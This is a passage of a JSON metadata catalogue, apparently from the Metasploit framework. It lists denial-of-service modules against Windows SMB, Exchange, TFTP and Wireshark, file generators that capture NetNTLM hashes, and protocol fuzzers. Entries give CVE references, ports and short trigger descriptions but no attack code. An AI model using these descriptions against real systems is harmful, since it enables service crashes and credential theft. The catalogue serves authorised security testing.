"description": "This module triggers a kernel pool corruption bug in SRV.SYS. Each\n call to the mailslot write function results in a two byte return value\n being written into the response packet. The code which creates this packet\n fails to consider these two bytes in the allocation routine, resulting in\n a slow corruption of the kernel memory pool. These two bytes are almost\n always set to \"\\xff\\xff\" (a short integer with value of -1).",
"references": [
"BID-19215",
"OSVDB-27644",
"CVE-2006-3942",
"URL-http://www.coresecurity.com/common/showdoc.php?idx=562&idxseccion=10",
"MSB-MS06-035"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms06_035_mailslot.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms06_035_mailslot",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/ms06_063_trans": {
"name": "Microsoft SRV.SYS Pipe Transaction No Null",
"full_name": "auxiliary/dos/windows/smb/ms06_063_trans",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a NULL pointer dereference flaw in the\n SRV.SYS driver of the Windows operating system. This bug was\n independently discovered by CORE Security and ISS.",
"references": [
"OSVDB-27644",
"MSB-MS06-063",
"CVE-2006-3942",
"BID-19215"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms06_063_trans.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms06_063_trans",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/ms09_001_write": {
"name": "Microsoft SRV.SYS WriteAndX Invalid DataOffset",
"full_name": "auxiliary/dos/windows/smb/ms09_001_write",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"j.v.vallejo <j.v.vallejo@gmail.com>"
],
"description": "This module exploits a denial of service vulnerability in the\n SRV.SYS driver of the Windows operating system.\n\n This module has been tested successfully against Windows Vista.",
"references": [
"MSB-MS09-001",
"OSVDB-48153",
"CVE-2008-4114",
"BID-31179"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms09_001_write.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms09_001_write",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/ms09_050_smb2_negotiate_pidhigh": {
"name": "Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table Dereference",
"full_name": "auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Laurent Gaffie <laurent.gaffie@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits an out-of-bounds function table dereference in the SMB\n request validation code of the SRV2.SYS driver included with Windows Vista, Windows 7\n release candidates (not RTM), and Windows 2008 Server prior to R2. Windows Vista\n without SP1 does not seem affected by this flaw.",
"references": [
"CVE-2009-3103",
"BID-36299",
"OSVDB-57799",
"MSB-MS09-050",
"URL-https://seclists.org/fulldisclosure/2009/Sep/0039.html",
"URL-http://www.microsoft.com/technet/security/advisory/975497.mspx"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms09_050_smb2_negotiate_pidhigh.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms09_050_smb2_negotiate_pidhigh",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/ms09_050_smb2_session_logoff": {
"name": "Microsoft SRV2.SYS SMB2 Logoff Remote Kernel NULL Pointer Dereference",
"full_name": "auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"sf <stephen_fewer@harmonysecurity.com>"
],
"description": "This module triggers a NULL pointer dereference in the SRV2.SYS kernel driver when processing\n an SMB2 logoff request before a session has been correctly negotiated, resulting in a BSOD.\n Affecting Vista SP1/SP2 (and possibly Server 2008 SP1/SP2), the flaw was resolved with MS09-050.",
"references": [
"CVE-2009-3103",
"OSVDB-57799",
"MSB-MS09-050"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms09_050_smb2_session_logoff.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms09_050_smb2_session_logoff",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/ms10_006_negotiate_response_loop": {
"name": "Microsoft Windows 7 / Server 2008 R2 SMB Client Infinite Loop",
"full_name": "auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Laurent Gaffie <laurent.gaffie@gmail.com>",
"hdm <x@hdm.io>"
],
"description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB client on Windows 7 and Windows Server 2008 R2. To trigger\n this bug, run this module as a service and force a vulnerable client\n to access the IP of this system as an SMB server. This can be accomplished\n by embedding a UNC path (\\HOST\\share\\something) into a web page if the\n target is using Internet Explorer, or a Word document otherwise.",
"references": [
"CVE-2010-0017",
"OSVDB-62244",
"MSB-MS10-006",
"URL-http://g-laurent.blogspot.com/2009/11/windows-7-server-2008r2-remote-kernel.html"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms10_006_negotiate_response_loop.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms10_006_negotiate_response_loop",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/ms10_054_queryfs_pool_overflow": {
"name": "Microsoft Windows SRV.SYS SrvSmbQueryFsInformation Pool Overflow DoS",
"full_name": "auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Laurent Gaffie <laurent.gaffie@gmail.com>",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB service on versions of Windows prior to the August 2010 Patch\n Tuesday. To trigger this bug, you must be able to access a share with\n at least read privileges. That generally means you will need authentication.\n However, if a system has a guest accessible share, you can trigger it\n without any authentication.",
"references": [
"CVE-2010-2550",
"OSVDB-66974",
"MSB-MS10-054",
"URL-https://seclists.org/fulldisclosure/2010/Aug/122"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms10_054_queryfs_pool_overflow.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms10_054_queryfs_pool_overflow",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/ms11_019_electbowser": {
"name": "Microsoft Windows Browser Pool DoS",
"full_name": "auxiliary/dos/windows/smb/ms11_019_electbowser",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Cupidon-3005",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a denial of service flaw in the Microsoft\n Windows SMB service on versions of Windows Server 2003 that have been\n configured as a domain controller. By sending a specially crafted election\n request, an attacker can cause a pool overflow.\n\n The vulnerability appears to be due to an error handling a length value\n while calculating the amount of memory to copy to a buffer. When there are\n zero bytes left in the buffer, the length value is improperly decremented\n and an integer underflow occurs. The resulting value is used in several\n calculations and is then passed as the length value to an inline memcpy\n operation.\n\n Unfortunately, the length value appears to be fixed at -2 (0xfffffffe) and\n causes considerable damage to kernel heap memory. While theoretically possible,\n it does not appear to be trivial to turn this vulnerability into remote (or\n even local) code execution.",
"references": [
"CVE-2011-0654",
"BID-46360",
"OSVDB-70881",
"MSB-MS11-019",
"EDB-16166",
"URL-https://seclists.org/fulldisclosure/2011/Feb/285"
],
"platform": "",
"arch": "",
"rport": 138,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/auxiliary/dos/windows/smb/ms11_019_electbowser.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/ms11_019_electbowser",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/rras_vls_null_deref": {
"name": "Microsoft RRAS InterfaceAdjustVLSPointers NULL Dereference",
"full_name": "auxiliary/dos/windows/smb/rras_vls_null_deref",
"rank": 300,
"disclosure_date": "2006-06-14",
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module triggers a NULL dereference in svchost.exe on\n all current versions of Windows that run the RRAS service. This\n service is only accessible without authentication on Windows XP\n SP1 (using the SRVSVC pipe).",
"references": [
"OSVDB-64340"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/smb/rras_vls_null_deref.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/rras_vls_null_deref",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smb/vista_negotiate_stop": {
"name": "Microsoft Vista SP0 SMB Negotiate Protocol DoS",
"full_name": "auxiliary/dos/windows/smb/vista_negotiate_stop",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a flaw in Windows Vista that allows a remote\n unauthenticated attacker to disable the SMB service. This vulnerability\n was silently fixed in Microsoft Vista Service Pack 1.",
"references": [
"OSVDB-64341"
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/smb/vista_negotiate_stop.rb",
"is_install_path": true,
"ref_name": "dos/windows/smb/vista_negotiate_stop",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/smtp/ms06_019_exchange": {
"name": "MS06-019 Exchange MODPROP Heap Overflow",
"full_name": "auxiliary/dos/windows/smtp/ms06_019_exchange",
"rank": 300,
"disclosure_date": "2004-11-12",
"type": "auxiliary",
"author": [
"pusscat <pusscat@metasploit.com>"
],
"description": "This module triggers a heap overflow vulnerability in MS\n Exchange that occurs when multiple malformed MODPROP values\n occur in a VCAL request.",
"references": [
"BID-17908",
"CVE-2006-0027",
"MSB-MS06-019"
],
"platform": "",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/smtp/ms06_019_exchange.rb",
"is_install_path": true,
"ref_name": "dos/windows/smtp/ms06_019_exchange",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/ssh/sysax_sshd_kexchange": {
"name": "Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service",
"full_name": "auxiliary/dos/windows/ssh/sysax_sshd_kexchange",
"rank": 300,
"disclosure_date": "2013-03-17",
"type": "auxiliary",
"author": [
"Matt \"hostess\" Andreko <mandreko@accuvant.com>"
],
"description": "This module sends a specially-crafted SSH Key Exchange causing the service to\n crash.",
"references": [
"OSVDB-92081",
"URL-http://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html"
],
"platform": "",
"arch": "",
"rport": 22,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/ssh/sysax_sshd_kexchange.rb",
"is_install_path": true,
"ref_name": "dos/windows/ssh/sysax_sshd_kexchange",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/tftp/pt360_write": {
"name": "PacketTrap TFTP Server 2.2.5459.0 DoS",
"full_name": "auxiliary/dos/windows/tftp/pt360_write",
"rank": 300,
"disclosure_date": "2008-10-29",
"type": "auxiliary",
"author": [
"kris katterjohn <katterjohn@gmail.com>"
],
"description": "The PacketTrap TFTP server version 2.2.5459.0 can be\n brought down by sending a special write request.",
"references": [
"CVE-2008-1311",
"OSVDB-42932",
"EDB-6863"
],
"platform": "",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/tftp/pt360_write.rb",
"is_install_path": true,
"ref_name": "dos/windows/tftp/pt360_write",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/windows/tftp/solarwinds": {
"name": "SolarWinds TFTP Server 10.4.0.10 Denial of Service",
"full_name": "auxiliary/dos/windows/tftp/solarwinds",
"rank": 300,
"disclosure_date": "2010-05-21",
"type": "auxiliary",
"author": [
"Nullthreat"
],
"description": "The SolarWinds TFTP server can be shut down by sending a 'netascii' read\n request with a specially crafted file name.",
"references": [
"CVE-2010-2115",
"OSVDB-64845",
"EDB-12683"
],
"platform": "",
"arch": "",
"rport": 69,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/windows/tftp/solarwinds.rb",
"is_install_path": true,
"ref_name": "dos/windows/tftp/solarwinds",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/wireshark/capwap": {
"name": "Wireshark CAPWAP Dissector DoS",
"full_name": "auxiliary/dos/wireshark/capwap",
"rank": 300,
"disclosure_date": "2014-04-28",
"type": "auxiliary",
"author": [
"Laurent Butti",
"j0sm1"
],
"description": "This module injects a malformed UDP packet to crash Wireshark and TShark 1.8.0 to 1.8.7, as well\n as 1.6.0 to 1.6.15. The vulnerability exists in the CAPWAP dissector which fails to handle a\n packet correctly when an incorrect length is given.",
"references": [
"CVE-2013-4074",
"OSVDB-94091",
"BID-60500"
],
"platform": "",
"arch": "",
"rport": 5247,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/wireshark/capwap.rb",
"is_install_path": true,
"ref_name": "dos/wireshark/capwap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/wireshark/chunked": {
"name": "Wireshark chunked_encoding_dissector Function DOS",
"full_name": "auxiliary/dos/wireshark/chunked",
"rank": 300,
"disclosure_date": "2007-02-22",
"type": "auxiliary",
"author": [
"Matteo Cantoni <goony@nothink.org>"
],
"description": "Wireshark crashes when dissecting an HTTP chunked response.\n Versions affected: 0.99.5 (Bug 1394)",
"references": [
"CVE-2007-3389",
"OSVDB-37643",
"URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=1394"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/wireshark/chunked.rb",
"is_install_path": true,
"ref_name": "dos/wireshark/chunked",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/wireshark/cldap": {
"name": "Wireshark CLDAP Dissector DOS",
"full_name": "auxiliary/dos/wireshark/cldap",
"rank": 300,
"disclosure_date": "2011-03-01",
"type": "auxiliary",
"author": [
"joernchen <joernchen@phenoelit.de> (Phenoelit)"
],
"description": "This module causes infinite recursion to occur within the\n CLDAP dissector by sending a specially crafted UDP packet.",
"references": [
"CVE-2011-1140",
"OSVDB-71552",
"URL-http://www.wireshark.org/security/wnpa-sec-2011-04.html",
"URL-https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5717"
],
"platform": "",
"arch": "",
"rport": 389,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/wireshark/cldap.rb",
"is_install_path": true,
"ref_name": "dos/wireshark/cldap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_dos/wireshark/ldap": {
"name": "Wireshark LDAP Dissector DOS",
"full_name": "auxiliary/dos/wireshark/ldap",
"rank": 300,
"disclosure_date": "2008-03-28",
"type": "auxiliary",
"author": [
"MC <mc@metasploit.com>"
],
"description": "The LDAP dissector in Wireshark 0.99.2 through 0.99.8 allows remote attackers\n to cause a denial of service (application crash) via a malformed packet.",
"references": [
"CVE-2008-1562",
"OSVDB-43840"
],
"platform": "",
"arch": "",
"rport": 389,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/dos/wireshark/ldap.rb",
"is_install_path": true,
"ref_name": "dos/wireshark/ldap",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fileformat/badpdf": {
"name": "BADPDF Malicious PDF Creator",
"full_name": "auxiliary/fileformat/badpdf",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Assaf Baharav",
"Yaron Fruchtmann",
"Ido Solomon",
"Richard Davy - secureyourit.co.uk"
],
"description": "This module can either create a blank PDF file which contains a UNC link which can be used\n to capture NetNTLM credentials, or if the PDFINJECT option is used it will inject the necessary\n code into an existing PDF document if possible.",
"references": [
"CVE-2018-4993",
"URL-https://research.checkpoint.com/ntlm-credentials-theft-via-pdf-files/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-01-09 14:30:24 +0000",
"path": "/modules/auxiliary/fileformat/badpdf.rb",
"is_install_path": true,
"ref_name": "fileformat/badpdf",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fileformat/multidrop": {
"name": "Windows SMB Multi Dropper",
"full_name": "auxiliary/fileformat/multidrop",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Richard Davy - secureyourit.co.uk",
"Lnk Creation Code by Mubix",
"asoto-r7"
],
"description": "Depending on the given filename extension, this module creates either\n a .lnk, .scf, .url, .xml, or desktop.ini file which includes a reference\n to the specified remote host, causing SMB connections to be initiated\n from any user that views the file.",
"references": [
"URL-https://malicious.link/blog/2012/02/11/ms08_068-ms10_046-fun-until-2018",
"URL-https://malicious.link/post/2012/2012-02-19-developing-the-lnk-metasploit-post-module-with-mona/",
"URL-https://bohops.com/2018/08/04/capturing-netntlm-hashes-with-office-dot-xml-documents/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-09-05 11:51:48 +0000",
"path": "/modules/auxiliary/fileformat/multidrop.rb",
"is_install_path": true,
"ref_name": "fileformat/multidrop",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fileformat/odt_badodt": {
"name": "LibreOffice 6.03 /Apache OpenOffice 4.1.5 Malicious ODT File Generator",
"full_name": "auxiliary/fileformat/odt_badodt",
"rank": 300,
"disclosure_date": "2018-05-01",
"type": "auxiliary",
"author": [
"Richard Davy - secureyourit.co.uk"
],
"description": "Generates a Malicious ODT File which can be used with auxiliary/server/capture/smb or similar to capture hashes.",
"references": [
"CVE-2018-10583",
"URL-https://secureyourit.co.uk/wp/2018/05/01/creating-malicious-odt-files/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2018-06-06 11:26:20 +0000",
"path": "/modules/auxiliary/fileformat/odt_badodt.rb",
"is_install_path": true,
"ref_name": "fileformat/odt_badodt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/dns/dns_fuzzer": {
"name": "DNS and DNSSEC Fuzzer",
"full_name": "auxiliary/fuzzers/dns/dns_fuzzer",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"pello <fropert@packetfault.org>"
],
"description": "This module will connect to a DNS server and perform DNS and\n DNSSEC protocol-level fuzzing. Note that this module may inadvertently\n crash the target server.",
"references": [
],
"platform": "",
"arch": "",
"rport": 53,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/dns/dns_fuzzer.rb",
"is_install_path": true,
"ref_name": "fuzzers/dns/dns_fuzzer",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/ftp/client_ftp": {
"name": "Simple FTP Client Fuzzer",
"full_name": "auxiliary/fuzzers/ftp/client_ftp",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"corelanc0d3r <peter.ve@corelan.be>"
],
"description": "This module will serve an FTP server and perform FTP client interaction fuzzing",
"references": [
"URL-http://www.corelan.be:8800/index.php/2010/10/12/death-of-an-ftp-client/"
],
"platform": "",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/ftp/client_ftp.rb",
"is_install_path": true,
"ref_name": "fuzzers/ftp/client_ftp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/ftp/ftp_pre_post": {
"name": "Simple FTP Fuzzer",
"full_name": "auxiliary/fuzzers/ftp/ftp_pre_post",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"corelanc0d3r <peter.ve@corelan.be>",
"jduck <jduck@metasploit.com>"
],
"description": "This module will connect to an FTP server and perform pre- and post-authentication fuzzing",
"references": [
],
"platform": "",
"arch": "",
"rport": 21,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2019-03-05 03:38:51 +0000",
"path": "/modules/auxiliary/fuzzers/ftp/ftp_pre_post.rb",
"is_install_path": true,
"ref_name": "fuzzers/ftp/ftp_pre_post",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/http/http_form_field": {
"name": "HTTP Form Field Fuzzer",
"full_name": "auxiliary/fuzzers/http/http_form_field",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"corelanc0d3r",
"Paulino Calderon <calderon@websec.mx>"
],
"description": "This module will grab all fields from a form,\n and launch a series of POST actions, fuzzing the contents\n of the form fields. You can optionally fuzz headers too\n (option is enabled by default)",
"references": [
"URL-http://www.corelan.be:8800/index.php/2010/11/12/metasploit-module-http-form-field-fuzzer"
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/http/http_form_field.rb",
"is_install_path": true,
"ref_name": "fuzzers/http/http_form_field",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/http/http_get_uri_long": {
"name": "HTTP GET Request URI Fuzzer (Incrementing Lengths)",
"full_name": "auxiliary/fuzzers/http/http_get_uri_long",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullthreat"
],
"description": "This module sends a series of HTTP GET requests with incrementing URL lengths.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/http/http_get_uri_long.rb",
"is_install_path": true,
"ref_name": "fuzzers/http/http_get_uri_long",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/http/http_get_uri_strings": {
"name": "HTTP GET Request URI Fuzzer (Fuzzer Strings)",
"full_name": "auxiliary/fuzzers/http/http_get_uri_strings",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"nullthreat"
],
"description": "This module sends a series of HTTP GET requests with malicious URIs.",
"references": [
],
"platform": "",
"arch": "",
"rport": 80,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/http/http_get_uri_strings.rb",
"is_install_path": true,
"ref_name": "fuzzers/http/http_get_uri_strings",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/ntp/ntp_protocol_fuzzer": {
"name": "NTP Protocol Fuzzer",
"full_name": "auxiliary/fuzzers/ntp/ntp_protocol_fuzzer",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"Jon Hart <jon_hart@rapid7.com>"
],
"description": "A simplistic fuzzer for the Network Time Protocol that sends the\n following probes to understand NTP and look for anomalous NTP behavior:\n\n * All possible combinations of NTP versions and modes, even if not\n allowed or specified in the RFCs\n * Short versions of the above\n * Short, invalid datagrams\n * Full-size, random datagrams\n * All possible NTP control messages\n * All possible NTP private messages\n\n The findings of this fuzzer are not necessarily indicative of bugs,\n let alone vulnerabilities, rather they point out interesting things\n that might deserve more attention. Furthermore, this module is not\n particularly intelligent and there are many more areas of NTP that\n could be explored, including:\n\n * Warn if the response is 100% identical to the request\n * Warn if the \"mode\" (if applicable) doesn't align with what we expect,\n * Filter out the 12-byte mode 6 unsupported opcode errors.\n * Fuzz the control message payload offset/size/etc. There be bugs",
"references": [
],
"platform": "",
"arch": "",
"rport": 123,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-09-12 09:54:09 +0000",
"path": "/modules/auxiliary/fuzzers/ntp/ntp_protocol_fuzzer.rb",
"is_install_path": true,
"ref_name": "fuzzers/ntp/ntp_protocol_fuzzer",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/smb/smb2_negotiate_corrupt": {
"name": "SMB Negotiate SMB2 Dialect Corruption",
"full_name": "auxiliary/fuzzers/smb/smb2_negotiate_corrupt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SMB negotiate requests that advertise an\n SMB2 dialect with corrupted bytes.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb2_negotiate_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/smb/smb2_negotiate_corrupt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/smb/smb_create_pipe": {
"name": "SMB Create Pipe Request Fuzzer",
"full_name": "auxiliary/fuzzers/smb/smb_create_pipe",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SMB create pipe\n requests using malicious strings.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb_create_pipe.rb",
"is_install_path": true,
"ref_name": "fuzzers/smb/smb_create_pipe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/smb/smb_create_pipe_corrupt": {
"name": "SMB Create Pipe Request Corruption",
"full_name": "auxiliary/fuzzers/smb/smb_create_pipe_corrupt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SMB create pipe requests with corrupted bytes.",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
139,
445
],
"autofilter_services": [
"netbios-ssn",
"microsoft-ds"
],
"targets": null,
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb_create_pipe_corrupt.rb",
"is_install_path": true,
"ref_name": "fuzzers/smb/smb_create_pipe_corrupt",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"auxiliary_fuzzers/smb/smb_negotiate_corrupt": {
"name": "SMB Negotiate Dialect Corruption",
"full_name": "auxiliary/fuzzers/smb/smb_negotiate_corrupt",
"rank": 300,
"disclosure_date": null,
"type": "auxiliary",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module sends a series of SMB negotiate requests with corrupted bytes",
"references": [
],
"platform": "",
"arch": "",
"rport": 445,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": null,
"mod_time": "2017-08-24 21:38:44 +0000",
"path": "/modules/auxiliary/fuzzers/smb/smb_negotiate_corrupt.rb",
"is_install_path": true,
